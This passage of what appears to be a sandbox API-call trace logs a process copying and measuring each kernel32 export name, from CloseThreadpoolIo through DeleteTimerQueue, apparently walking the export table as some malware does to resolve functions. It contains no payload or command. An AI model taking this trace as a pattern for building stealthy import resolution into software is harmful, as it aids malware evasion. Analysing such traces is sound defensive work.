(lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.564] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.564] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.564] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.564] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.565] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.565] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.565] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.565] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.565] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.565] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.565] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.565] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.565] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.565] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.565] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.565] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.565] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.565] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.565] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.565] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.565] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.565] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.565] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.566] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.566] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.566] lstrlenA (lpString="COPYFILEA") returned 9 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.566] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.566] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.566] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.566] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.566] lstrlenA (lpString="COPYFILEW") returned 9 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.566] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.566] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.566] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.566] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.566] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.566] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.566] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.566] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.566] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.566] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.566] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.566] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.567] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.567] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.567] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.567] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.567] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.567] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.567] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.567] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.567] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.567] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.567] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.567] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.567] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.567] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.567] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.567] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.567] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.567] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.567] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.567] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.568] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.568] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.568] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.568] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.568] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.568] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.568] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.568] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.568] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.568] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.568] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.568] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.568] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.568] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.568] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.568] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.568] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.568] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.568] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.569] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.569] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.569] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.569] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.569] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.569] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.569] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.569] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.569] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.569] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.569] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.569] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.569] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.569] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.569] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.569] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.569] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.569] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.569] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.570] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.570] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.570] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.570] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.570] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.570] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.570] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.570] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.570] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.570] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.570] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.570] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.570] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.570] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.570] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.570] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.570] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.570] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.570] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.570] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.571] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.571] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.571] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.571] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.571] lstrlenA (lpString="DELETEATOM") returned 10 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.571] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.571] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.571] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.571] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.571] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.571] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.571] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.571] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.571] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.571] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: 